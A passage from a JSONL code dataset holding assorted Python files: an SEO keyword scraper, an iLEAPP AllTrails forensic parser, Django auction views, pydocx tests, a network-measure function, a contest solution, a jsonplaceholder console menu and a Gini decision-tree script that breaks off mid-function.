#请求文件ID\r\n request1 = {'seedWords':seedWords,'seedFilter': {'device':0,'competeLow':0,}}\r\n jsonEnv1 = JsonEnvelop(header,request1)\r\n jsonStr1=json.dumps(jsonEnv1, default=convert_to_builtin_type, skipkeys=True)\r\n\r\n while True:\r\n try:\r\n print('请求文件ID')\r\n r1 = requests.post(url1,data=jsonStr1,headers=headers)\r\n except:\r\n time.sleep(30)\r\n continue\r\n else:\r\n try:\r\n time.sleep(3)\r\n fileId = r1.json()['body']['data'][0]['fileId']\r\n except:\r\n print('请求文件ID:请求出错,等待30s')\r\n time.sleep(30)\r\n else:\r\n break\r\n\r\n #根据文件ID查询文件生成状态\r\n request2 = {\"fileId\":fileId}\r\n jsonEnv2 = JsonEnvelop(header,request2)\r\n jsonStr2=json.dumps(jsonEnv2, default=convert_to_builtin_type, skipkeys=True)\r\n times = 1\r\n con = 0\r\n\r\n while True:\r\n time.sleep(5)\r\n print('请求文件状态')\r\n r2 = requests.post(url2,data=jsonStr2,headers=headers)\r\n try:\r\n time.sleep(7)\r\n filestatus = r2.json()['body']['data'][0]['isGenerated']\r\n except:\r\n print('获取文件状态:请求失败,30s后重试')\r\n time.sleep(30)\r\n else:\r\n if filestatus == 3:\r\n break\r\n elif filestatus != 3 and times %3 != 0:\r\n print('获取文件状态:文件处理中……')\r\n times = times + 1\r\n elif times %3 == 0:\r\n print('获取文件状态:接口阻塞,等待10min,%s' %time.strftime('%H:%M:%S'))\r\n print('当前文件id %s' %fileId)\r\n for i in lines:\r\n failwords.write(i)\r\n times = times + 1\r\n con = 1\r\n time.sleep(610)\r\n break\r\n\r\n #如果等了10分钟,则之前的fileId已经因为超时下载不到文件了,可以选择跳过之后的获取部分\r\n if con == 1:\r\n continue\r\n\r\n #获取文件路径\r\n request3 = {\"fileId\":fileId}\r\n jsonEnv3 = JsonEnvelop(header,request3)\r\n jsonStr3=json.dumps(jsonEnv3, default=convert_to_builtin_type, skipkeys=True)\r\n\r\n while True:\r\n print('请求文件路径')\r\n r3 = requests.post(url3,data=jsonStr3,headers=headers)\r\n try:\r\n time.sleep(3)\r\n filePath = r3.json()['body']['data'][0]['filePath']\r\n except:\r\n print('请求文件路径:请求失败,30s后重试')\r\n time.sleep(30)\r\n else:\r\n break\r\n\r\n\r\n #设置文件名\r\n count = count + 1\r\n filename = time.strftime('%Y-%m-%d') + '-' + str(count) + '.csv'\r\n\r\n #下载文件\r\n r = requests.get(filePath)\r\n with open('%s' %filename,\"wb\") as file:\r\n file.write(r.content)\r\n print('文件%s下载完成' %filename)\r\n\r\n\r\n#记录结束时间\r\nendtime = time.strftime('%Y/%m/%d %H:%M:%S')\r\nprint('耗时:%s - %s' %(starttime,endtime))\r\n\r\nfailwords.close()\r\n","repo_name":"beautyonly/seo-python-tools","sub_path":"百度API挖词.py","file_name":"百度API挖词.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"63"} +{"seq_id":"28019445074","text":"import sqlite3\nimport textwrap\n\nfrom scripts.artifact_report import ArtifactHtmlReport\nfrom scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, get_next_unused_name, open_sqlite_db_readonly\n\ndef get_AllTrails(files_found, report_folder, seeker, wrap_text):\n \n for file_found in files_found:\n file_found = str(file_found)\n if not file_found.endswith('AllTrails.sqlite'):\n continue # Skip all other files\n \n db = open_sqlite_db_readonly(file_found)\n cursor = db.cursor()\n cursor.execute('''\n Select \n ZTRAIL.ZNAME,\n ZTRAIL.ZROUTETYPENAME,\n CASE ZACTIVITYSTATS.ZDIFFICULTY\n WHEN 1 THEN 'Easy'\n WHEN 3 THEN 'Moderate'\n WHEN 5 THEN 'Hard'\n END,\n ZTRAIL.ZRATING,\n ZTRAIL.ZREVIEWCOUNT,\n ZTRAIL.ZLENGTH as \"Length (Meters)\",\n ZTRAIL.ZELEVATIONGAIN as \"Elevation Gain (Meters)\",\n ZLOCATION.ZLATITUDE,\n ZLOCATION.ZLONGITUDE,\n ZLOCATION.ZCITY,\n ZLOCATION.ZREGION,\n ZLOCATION.ZREGIONNAME,\n ZLOCATION.ZPOSTALCODE,\n ZLOCATION.ZCOUNTRY,\n ZLOCATION.ZCOUNTRYNAME,\n ZPARKAREA.ZNAME as \"Park Area Name\"\n From ZLOCATION\n Join ZTRAIL On ZLOCATION.Z_PK = ZTRAIL.ZLOCATION\n Join ZPARKAREA On ZTRAIL.Z_PK = ZPARKAREA.ZTRAIL\n Join ZACTIVITYSTATS On ZTRAIL.Z_PK = ZACTIVITYSTATS.ZTRAIL\n ''')\n\n all_rows = cursor.fetchall()\n usageentries = len(all_rows)\n if usageentries > 0:\n report = ArtifactHtmlReport('AllTrails - Trail Details')\n report.start_artifact_report(report_folder, 'AllTrails - Trail Details')\n report.add_script()\n data_headers = ('Trail Name','Route Type','Trail Difficulty','Rating','Review Count','Length (Meters)','Elevation Gain (Meters)','Latitude','Longitude','City','State/Region','State/Region Name','Zip Code','Country','Country Name','Parking Area Name') # Don't remove the comma, that is required to make this a tuple as there is only 1 element\n data_list = []\n for row in all_rows:\n data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12],row[13],row[14],row[15],))\n\n report.write_artifact_data_table(data_headers, data_list, file_found)\n report.end_artifact_report()\n \n tsvname = f'AllTrails - Trail Details'\n tsv(report_folder, data_headers, data_list, tsvname)\n \n else:\n logfunc('No AllTrails - Trail Details data available')\n \n cursor.execute('''\n Select \n datetime(ZUSER.ZCREATIONTIME + 978307200,'unixepoch') as \"Creation Timestamp\",\n ZUSER.ZFIRSTNAME,\n ZUSER.ZLASTNAME,\n ZUSER.ZUSERNAME,\n ZPROFILE.ZEMAIL,\n ZUSER.ZREFERRALLINK,\n ZLOCATION.ZLATITUDE,\n ZLOCATION.ZLONGITUDE,\n ZLOCATION.ZCITY,\n ZLOCATION.ZREGION,\n ZLOCATION.ZREGIONNAME,\n ZLOCATION.ZCOUNTRY,\n ZLOCATION.ZCOUNTRYNAME,\n ZLOCATION.ZPOSTALCODE\n From ZUSER\n Inner Join ZPROFILE On ZUSER.Z_PK = ZPROFILE.ZUSER\n Inner Join ZLOCATION On ZUSER.ZLOCATION = ZLOCATION.Z_PK\n ''')\n\n all_rows = cursor.fetchall()\n usageentries = len(all_rows)\n if usageentries > 0:\n report = ArtifactHtmlReport('AllTrails - User Info')\n report.start_artifact_report(report_folder, 'AllTrails - User Info')\n report.add_script()\n data_headers = ('Creation Timestamp','First Name','Last Name','User Name','Email','Referral Link','Latitude','Longitude','City','Region','Region Name','Country','Country Name','Zip Code') # Don't remove the comma, that is required to make this a tuple as there is only 1 element\n data_list = []\n for row in all_rows:\n data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12],row[13]))\n\n report.write_artifact_data_table(data_headers, data_list, file_found)\n report.end_artifact_report()\n \n tsvname = f'AllTrails - User Info'\n tsv(report_folder, data_headers, data_list, tsvname)\n \n tlactivity = f'AllTrails - User Info'\n timeline(report_folder, tlactivity, data_list, data_headers)\n else:\n logfunc('No AllTrails - User Info data available')\n\n db.close()\n return\n\n__artifacts__ = {\n \"alltrails\": (\n \"AllTrails\",\n ('**/Documents/AllTrails.sqlite*'),\n get_AllTrails)\n}\n","repo_name":"abrignoni/iLEAPP","sub_path":"scripts/artifacts/AllTrails.py","file_name":"AllTrails.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"63"} +{"seq_id":"7748837165","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nimport pdb\nfrom .models import User, Listing, Bid, Comment, Category\n\ndef index(request):\n listings = Listing.objects.filter(listing_is_active = True)\n return render(request, \"auctions/index.html\",{\n \"listings\": listings\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create_listing(request):\n if request.method == \"POST\":\n try:\n newListing = Listing.objects.create(\n listing_title = request.POST[\"title\"],\n listing_image = request.FILES[\"image\"],\n listing_description = request.POST[\"description\"],\n listing_starting_bid = request.POST[\"bid\"],\n listing_current_price = request.POST[\"bid\"],\n listing_user = request.user,\n listing_is_active = True,\n listing_category = Category.objects.get(category_name=request.POST[\"category\"])\n )\n return HttpResponseRedirect(reverse(\"listing\", args=(newListing.id, \"Listing created successfuly!\")))\n except:\n return render(request,\"create-listing\",{\n \"error\":\"Please fill out all the fields before submitting.\"\n })\n else:\n categories = Category.objects.all()\n return render(request, \"auctions/create-listing.html\",{\n \"categories\": categories\n })\n\ndef listing(request, listing_id, message=\"\"):\n listing = Listing.objects.get(pk=listing_id)\n listing_in_watchlist = request.user in listing.listing_watchlist.all()\n comments = Comment.objects.filter(comment_listing = listing)\n return render(request, \"auctions/listing.html\",{\n \"listing\": listing,\n \"listing_in_watchlist\": listing_in_watchlist,\n \"message\": message, \n \"comments\": comments\n })\n\n@login_required\ndef watchlist(request):\n currentUser = request.user\n listings = currentUser.listingWatchlist.all()\n return render(request, \"auctions/watchlist.html\",{\n \"listings\": listings\n })\n\ndef categories(request):\n categories = Category.objects.all()\n return render(request, \"auctions/categories.html\", {\n \"categories\": categories\n })\n\ndef category(request, category_name):\n category = Category.objects.get(category_name=category_name)\n \n try:\n listings = Listing.objects.filter(listing_category = category, listing_is_active=True)\n except:\n listings = [] \n return render(request, \"auctions/category.html\",{\n \"listings\": listings\n })\n\n@login_required\ndef update_watchlist(request):\n if request.method == \"POST\":\n listing = Listing.objects.get(pk=int(request.POST[\"listing_id\"]))\n current_user = request.user\n if request.POST[\"action\"] == \"remove\":\n listing.listing_watchlist.remove(current_user)\n elif request.POST[\"action\"] == \"add\":\n listing.listing_watchlist.add(current_user) \n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Watchlist updated successfuly!\")))\n\n@login_required\ndef place_bid(request):\n if request.method == \"POST\":\n listing = Listing.objects.get(pk=request.POST[\"listing_id\"])\n if float(request.POST[\"bid\"]) > listing.listing_current_price:\n bid = Bid.objects.create(\n bid_listing = listing,\n bid_amount = float(request.POST[\"bid\"]),\n bid_user = request.user\n )\n listing.listing_current_price = bid.bid_amount\n listing.listing_winner = request.user\n listing.save()\n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Your bid was submitted successfully!\")))\n else:\n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Your bid must be higher than the current bid.\")))\n return HttpResponseRedirect(reverse('login'))\n\n@login_required\ndef submit_comment(request):\n if request.method == \"POST\":\n listing = Listing.objects.get(pk=int(request.POST[\"listing_id\"]))\n comment = Comment.objects.create(\n comment_user = request.user,\n comment_listing = listing,\n comment_text = request.POST[\"comment\"]\n )\n return HttpResponseRedirect(reverse(\"listing\", args=(listing.id, \"Your comment was submitted\")))\n return HttpResponseRedirect(reverse('login'))\n\n@login_required\ndef close_auction(request):\n if request.method == \"POST\":\n listing = Listing.objects.get(pk=int(request.POST[\"listing_id\"]))\n listing.listing_is_active = False\n listing.save()\n return HttpResponseRedirect(reverse('listing', args=(listing.id, \"Auction closed successfuly!\")))\n return HttpResponseRedirect(reverse('login'))","repo_name":"VenireVidereVincere/auctions-web-app","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"539413982","text":"# coding: utf-8\nfrom __future__ import (\n absolute_import,\n print_function,\n unicode_literals,\n)\n\nfrom unittest import TestCase\n\nfrom pydocx.openxml.wordprocessing import RunProperties\nfrom pydocx.util.xml import parse_xml_from_string\n\n\nclass RunPropertiesTestCase(TestCase):\n def _load_styles_from_xml(self, xml):\n root = parse_xml_from_string(xml)\n return RunProperties.load(root)\n\n def test_run_properties_with_symbol_font(self):\n xml = b'''\n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n\n self.assertTrue(properties.r_fonts.is_symbol())\n\n def test_bold_on(self):\n xml = b'''\n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.bold.value, 'on')\n assert bool(properties.bold)\n\n def test_bold_off(self):\n xml = b'''\n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.bold.value, 'off')\n assert not bool(properties.bold)\n\n def test_items(self):\n xml = b'''\n \n \n \n \n '''\n properties = self._load_styles_from_xml(xml)\n result = dict(properties.fields)\n self.assertEqual(\n sorted(result.keys()),\n sorted(['bold', 'italic']),\n )\n assert not bool(result['bold'])\n assert bool(result['italic'])\n\n def test_size_property_returns_None_when_sz_is_None(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.size, None)\n\n def test_size_property_returns_int_of_sz(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.size, int(properties.sz))\n\n def test_position_property_returns_0_when_pos_is_None(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.position, 0)\n\n def test_position_property_returns_int_of_position(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.position, int(properties.pos))\n\n def test_size_property_can_be_a_decimal(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.size, 10.1234)\n\n def test_size_property_has_garbage_returns_0(self):\n xml = ''\n properties = self._load_styles_from_xml(xml)\n self.assertEqual(properties.size, None)\n","repo_name":"CenterForOpenScience/pydocx","sub_path":"tests/openxml/wordprocessing/test_run_properties.py","file_name":"test_run_properties.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":176,"dataset":"github-code","pt":"63"} +{"seq_id":"10620226557","text":"import numpy as np\nfrom ..utils import process_input\n\ndef temporal_part_coef(tnet, communities=None, removeneg=False):\n r'''\n Temporal participation coefficient is a measure of diversity of connections across communities for individual nodes.\n\n Parameters\n ----------\n tnet : array, dict\n graphlet or contact sequence input. Only positive matrices considered.\n communities : array\n community vector. Either 1D (node) community index or 2D (node,time).\n removeneg : bool (default false)\n If true, all values < 0 are made to be 0. \n\n\n Returns\n -------\n P : array\n participation coefficient\n\n\n Notes\n -----\n\n Static participatoin coefficient is:\n\n .. math:: P_i = 1 - \\sum_s^{N_M}({{k_{is}}\\over{k_i}})^2 \n\n Where s is the index of each community (:math:`N_M`). :math:`k_i` is total degree of node. And :math:`k_{is}` is degree of connections within community.[part-1]_\n\n This \"temporal\" version only loops through temporal snapshots and calculates :math:`P_i` for each t.\n\n If directed, function sums axis=1, so tnet may need to be transposed before hand depending on what type of directed part_coef you are interested in.\n\n\n References\n ----------\n\n .. [part-1] Guimera et al (2005) Functional cartography of complex metabolic networks. Nature. 433: 7028, p895-900. [`Link `_]\n '''\n\n if communities is None:\n if isinstance(tnet,dict):\n if 'communities' in tnet.keys():\n communities = tnet['communities']\n else:\n raise ValueError('Community index not found')\n else:\n raise ValueError('Community must be provided for graphlet input')\n\n # Get input in right format\n tnet, netinfo = process_input(tnet, ['C', 'G', 'TN'])\n\n if np.sum(tnet<0) > 0 and not removeneg:\n raise ValueError('Negative connections found')\n if removeneg:\n tnet[tnet<0] = 0\n\n k_is = np.zeros([netinfo['netshape'][0],netinfo['netshape'][2]])\n part = np.ones([netinfo['netshape'][0],netinfo['netshape'][2]])\n\n for t in np.arange(0,netinfo['netshape'][2]):\n if len(communities.shape)==2:\n C = communities[:,t]\n else:\n C = communities\n for i in np.unique(C):\n k_is[:,t] += np.square(np.sum(tnet[:,C == i,t], axis=1))\n\n part = part - (k_is / np.square(np.sum(tnet, axis=1)))\n # Set any division by 0 to 0\n part[np.isnan(part)==1] = 0\n\n return part\n","repo_name":"rciric/teneto","sub_path":"teneto/networkmeasures/temporal_part_coef.py","file_name":"temporal_part_coef.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"42121307550","text":"from fractions import gcd\nfrom collections import Counter, deque, defaultdict\nfrom heapq import heappush, heappop, heappushpop, heapify, heapreplace, merge\nfrom bisect import bisect_left, bisect_right, bisect, insort_left, insort_right, insort\nfrom itertools import accumulate, product, permutations, combinations\n\ndef main():\n N, M, K = map(int, input().split())\n A = list(map(int, input().split()))\n B = list(map(int, input().split()))\n\n cumsumA = [0] + list(accumulate(A))\n cumsumB = [0] + list(accumulate(B))\n\n res = 0\n\n for i in range(N+1):\n if i == 0:\n for j in range(M, -1, -1):\n if cumsumB[j] <= K:\n max_j = j\n res = max(res, i + j)\n break\n else:\n for j in range(max_j, -1, -1):\n time = cumsumA[i] + cumsumB[j]\n if time <= K:\n max_j = j\n res = max(res, i + j)\n break\n \n print(res)\n\nif __name__ == '__main__':\n main()","repo_name":"chokoryu/atcoder","sub_path":"problems/abc172_c.py","file_name":"abc172_c.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"15431396464","text":"\"\"\"\nСайт для виконання завдання: https://jsonplaceholder.typicode.com\n\nНаписати програму, яка буде робити наступне:\n1. Робить запрос на https://jsonplaceholder.typicode.com/users і вертає коротку інформацію про користувачів (ID, ім'я, нікнейм)\n2. Запропонувати обрати користувача (ввести ID)\n3. Розробити наступну менюшку (із вкладеними пунктами):\n 1. Повна інформація про користувача\n 2. Пости:\n - перелік постів користувача (ID та заголовок)\n - інформація про конкретний пост (ID, заголовок, текст, кількість коментарів + перелік їхніх ID)\n 3. ТУДУшка:\n - список невиконаних задач\n - список виконаних задач\n 4. Вивести URL рандомної картинки\n\"\"\"\n\nfrom url_requests import get_requests_id, get_requests_user_info_by_id, get_requests_post_by_post_id, \\\n get_requests_post_by_user_id, \\\n get_requests_post_comments_by_post_id, get_requests_todos_by_user_id, get_requests_random_photo\n\n\ndef get_users_list():\n print(\"*\" * 30)\n print(f\" id name nikname\")\n print(\"*\" * 30)\n\n for i in get_requests_id():\n print(f'{i[\"id\"]:3} {str(i[\"name\"]).split()[0]:10} {i[\"username\"]}.')\n print(\"*\" * 30)\n\n\ndef get_short_user_info_by_id(user_id):\n for i in get_requests_user_info_by_id(user_id):\n return f'id: {i[\"id\"]},\\n' \\\n f'name: {i[\"name\"]},\\n' \\\n f'username: {i[\"username\"]}\\n'\n\n\ndef full_inf_user(user_id):\n pars: str = None\n\n for i in get_requests_user_info_by_id(user_id):\n pars = f'id user: {i[\"id\"]}\\n' \\\n f'name: {i[\"name\"]}\\n' \\\n f'nikname: {i[\"username\"]}\\n' \\\n f'email: {i[\"email\"]}\\n' \\\n f'
\\n' \\\n f'street: {i[\"address\"][\"street\"]}\\n' \\\n f'suite: {i[\"address\"][\"suite\"]}\\n' \\\n f'city: {i[\"address\"][\"city\"]}\\n' \\\n f'zipcode: {i[\"address\"][\"zipcode\"]}\\n' \\\n f'\\n' \\\n f'latitude: {i[\"address\"][\"geo\"][\"lat\"]}\\n' \\\n f'longitude: {i[\"address\"][\"geo\"][\"lng\"]}\\n' \\\n f'phone: {i[\"phone\"]}\\n' \\\n f'website: {i[\"website\"]}\\n' \\\n f'\\n' \\\n f'name: {i[\"company\"][\"name\"]}\\n' \\\n f'catchPhrase: {i[\"company\"][\"catchPhrase\"]}\\n' \\\n f'bs: {i[\"company\"][\"bs\"]}'\n\n print(pars)\n\n\ndef get_post_user(user_id):\n pars: str = None\n\n for i in get_requests_post_by_user_id(user_id):\n pars = f'Post ID: {i[\"id\"]}, title: {i[\"title\"]}'\n print(pars)\n\n\ndef get_user_post_id_range(user_id):\n post_id_list: list = []\n\n for i in get_requests_post_by_user_id(user_id):\n post_id_list.append(i[\"id\"])\n\n return int(min(post_id_list)), int(max(post_id_list))\n\n\ndef get_post_info_by_post_id(post_id):\n pars: str = None\n comment_id_list: list = []\n comments_list: dict = get_requests_post_comments_by_post_id(post_id)\n comments_num: int = len(comments_list)\n\n for i in comments_list:\n comment_id_list.append(i[\"id\"])\n\n for i in get_requests_post_by_post_id(post_id):\n pars = f'Post ID: {i[\"id\"]},\\n' \\\n f'title: {i[\"title\"]},\\n' \\\n f'{\">\" * 30}\\n' \\\n f'body: {i[\"body\"]},\\n' \\\n f'{\">\" * 30}\\n' \\\n f'comments num: {comments_num},\\n' \\\n f'comments list: {comment_id_list}'\n\n print(pars)\n\n\ndef get_todos(user_id, is_arg=True):\n if is_arg == False:\n print(\"*\" * 50)\n print(\"list of non-specific tasks: \")\n for i in get_requests_todos_by_user_id(user_id, False):\n pars = f'id: {i[\"id\"]}, title: {i[\"title\"]}'\n print(pars)\n\n elif is_arg == True:\n print(\"*\" * 50)\n print(\"list of tasks: \")\n for i in get_requests_todos_by_user_id(user_id):\n pars = f'id: {i[\"id\"]}, title: {i[\"title\"]}'\n print(pars)\n\n\ndef consol_menu():\n while True:\n try:\n if input(\"Want to continue y/n -> \").lower() == \"y\":\n get_users_list()\n in_id = input(\"enter the number id -> \")\n if int(in_id) in range(len(get_requests_id()) + 1):\n get_short_user_info_by_id(in_id)\n\n else:\n print(f\"<< incorrect id - > {in_id} >>\")\n continue\n\n else:\n exit()\n\n while True:\n print(\"*\" * 50)\n in_namb = input(\"1. Information about user\\n\"\n \"2. Post.\\n\"\n \"3. Todos\\n\"\n \"4. Enter URL of a random image\\n\"\n \"5. Back to menu.\\n\"\n \"choose -> \")\n\n print(\"*\" * 30)\n if int(in_namb) == 1:\n full_inf_user(in_id)\n\n elif int(in_namb) == 2:\n min_id, max_id = get_user_post_id_range(in_id)\n print(\"-----transcript of posts of koristuvach-----\")\n get_post_user(in_id)\n\n while True:\n try:\n print(\"-----if you want to return to the menu, click y/n.-----\")\n in_post_id = input(\"enter ID number to view -> \")\n if in_post_id.lower() == \"y\":\n consol_menu()\n\n elif in_post_id.lower() == \"n\":\n continue\n\n # else:\n # print(f\"entered incorrect y/n- > {in_post_id}\")\n\n if int(in_post_id) in range(min_id, max_id + 1):\n print(\"-----information about a specific post-----\")\n get_post_info_by_post_id(in_post_id)\n\n else:\n print(f\"entered incorrect Post ID - > {in_post_id}\")\n\n except Exception as err:\n print(f\"error -> {err}\")\n\n elif int(in_namb) == 3:\n get_todos(in_id, False)\n get_todos(in_id)\n\n elif int(in_namb) == 4:\n print(\"random url:\")\n get_requests_random_photo()\n\n elif int(in_namb) == 5:\n consol_menu()\n\n except Exception as err:\n print(f\"incorrect input -> {err}\")\n\n\nif __name__ in \"__main__\":\n consol_menu()\n","repo_name":"EduardKurbanov/HT_11","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12765514930","text":"import _thread\nimport time\n\ndef print_time( threadName, delay):\n count = 0\n while count < 5:\n time.sleep(delay)\n count += 1\n print (\"%s: %s\" % ( threadName, time.ctime(time.time()) ))\n\n# Create two threads as follows\n","repo_name":"dorbenzvi/asos-price-check","sub_path":"pricecheck/checkForDrop.py","file_name":"checkForDrop.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"26325355706","text":"import collections\nfrom math import pow\nimport operator\n\n\n#tạo dữ liệu đầu vào\ndef create_dataset():\n dataset = [['nam', '0', 'rẻ', 'thấp', 'bus'],\n ['nam', '1', 'rẻ', 'trung bình', 'bus'],\n ['nữ', '0', 'rẻ', 'thấp', 'bus'],\n ['nam', '1', 'rẻ', 'trung bình', 'bus'],\n ['nữ', '1', 'đắt', 'cao', 'oto'],\n ['nam', '2', 'đắt', 'trung bình', 'oto'],\n ['nữ', '2', 'đắt', 'cao', 'oto'],\n ['nữ', '1', 'rẻ', 'trung bình', 'tàu'],\n ['nam', '0', 'tiêu chuẩn', 'trung bình', 'tàu']]\n\n labels = ['giới tính', 'sở hữu mấy xe', 'chi phí', 'mức thu nhập', 'loại xe']\n\n labels_full = {}\n\n for i in range(len(labels)):\n label_list = [example[i] for example in dataset] # Đếm các dữ liệu chuẩn đầu ra\n unique_label = set(label_list) # chia kết quả nó ra thành mảng ko trùng lặp\n labels_full[labels[i]] = unique_label #tổng quát tất cả mảng chia nó ra\n\n return dataset, labels, labels_full\n\n#Tính phần hệ số gini\ndef calc_gini_index(dataset):\n num_entries = len(dataset) # đếm số dữ liệu đầu vào\n label_counts = collections.defaultdict(int) # đếm số dữ liệu đầu vào những tách độ giống nhau\n\n for feature_vec in dataset:\n current_label = feature_vec[-1] #dữ liệu cuối cùng của kết quả\n label_counts[current_label] += 1 #đếm dữ liệu cuối cùng\n\n gini_index = 1.0\n\n for key in label_counts:\n prob = float(label_counts[key]) / num_entries #Tính tỉ lệ của từng phần trong dữ liệu\n gini_index -= pow(prob, 2)\n\n return gini_index\n\n#tính phần hệ số gini\ndef calc_delta_gini(dataset, feature_list, i, base_gini):\n unique_values = set(feature_list) # Lấy dữ liệu đầu vào đầu tiên\n new_gini = 1.0\n\n for value in unique_values:\n sub_dataset = split_dataset(dataset=dataset, axis=i, value=value) # cắt phần dữ liệu chia nó thành 4 mảng\n prob = len(sub_dataset) / float(len(dataset)) # tỉ lệ của số lượng dữ liệu chia mảng với tổng số lượng data\n new_gini -= prob * calc_gini_index(sub_dataset)\n\n delta_gini = base_gini - new_gini\n\n return delta_gini\n\n\n\n\n\n#tính phần hệ số gini với mỗi thuộc tính\ndef calc_gini_gain_for_series(dataset, i, base_gini):\n best_delta_gini = 0.0\n best_split_point = -1\n\n feature_list = [example[i] for example in dataset] # Lấy dữ liệu đầu tiên của cột data\n class_list = [example[-1] for example in dataset] # Lấy dữ liệu cuối của cột data\n dict_list = dict(zip(feature_list, class_list)) #Thêm nó vào dạng thư viện\n\n sorted_feature_list = sorted(dict_list.items(), key=operator.itemgetter(0)) #Cho vào trong các tập\n num_feature_list = len(sorted_feature_list) # đếm số lượng các tập\n split_point_list = [round((sorted_feature_list[i][0] + sorted_feature_list[i + 1][0]) / 2.0, 3) for i in\n range(num_feature_list - 1)]\n\n # tính toán mức tăng thông tin của mỗi điểm phân chia\n for split_point in split_point_list:\n elt_dataset, gt_dataset = split_dataset_for_series(dataset, i, split_point)\n #Tính số lượng của từng tệp đã nhận\n new_gini = len(elt_dataset) / len(sorted_feature_list) * calc_gini_index(elt_dataset) \\\n + len(gt_dataset) / len(sorted_feature_list) * calc_gini_index(gt_dataset)\n\n delta_gini = base_gini - new_gini\n if delta_gini < best_delta_gini:\n best_split_point = split_point\n best_delta_gini = delta_gini\n\n return best_delta_gini, best_split_point\n\n\n\n\n#chọn ra hàm tối ưu\ndef choose_best_feature_to_split(dataset):\n num_features = len(dataset[0]) - 1\n base_gini = calc_gini_index(dataset)\n best_delta_gini = 1.0\n best_feature = -1\n flag_series = 0\n best_split_point = 0.0\n new_split_point = 0.0\n\n for i in range(num_features):\n feature_list = [example[i] for example in dataset] #Lấy dữ liệu của phần 3\n if isinstance(feature_list[0], str):\n delta_gini = calc_delta_gini(dataset, feature_list, i, base_gini)\n else:\n delta_gini, new_split_point = calc_gini_gain_for_series(dataset, i, base_gini)\n\n if delta_gini < best_delta_gini:\n best_delta_gini = delta_gini\n best_feature = i\n flag_series = 0\n\n if not isinstance(dataset[0][best_feature], str):\n flag_series = 1\n best_split_point = new_split_point\n\n if flag_series:\n return best_feature, best_split_point\n else:\n return best_feature\n\n\n\n# cắt các dữ liệu theo cột\ndef split_dataset_for_series(dataset, axis, value):\n elt_dataset = []\n gt_dataset = []\n\n for feature in dataset:\n if feature[axis] <= value:\n elt_dataset.append(feature)\n else:\n gt_dataset.append(feature)\n\n return elt_dataset, gt_dataset\n\n# cắt dữ liệu theo data\ndef split_dataset(dataset, axis, value):\n ret_dataset = []\n\n for feature_vec in dataset:\n if feature_vec[axis] == value:\n reduced_vec = feature_vec[:axis]\n reduced_vec.extend(feature_vec[axis + 1:])\n ret_dataset.append(reduced_vec)\n\n return ret_dataset\n\n\n#tìm ra nhánh chính\ndef majority_count(class_list):\n class_count = collections.defaultdict(int)\n\n for vote in class_list:\n class_count[vote] += 1\n\n sorted_class_count = sorted(class_count.items(), key=operator.itemgetter(1), reverse=True)\n\n return sorted_class_count[0][0]\n\n\n\n#tạo ra cây\ndef create_tree(dataset, labels):\n class_list = [example[-1] for example in dataset]\n\n if class_list.count(class_list[0]) == len(class_list):\n return class_list[0]\n # Nếu cây chỉ có 1 nhánh duy nhất\n if 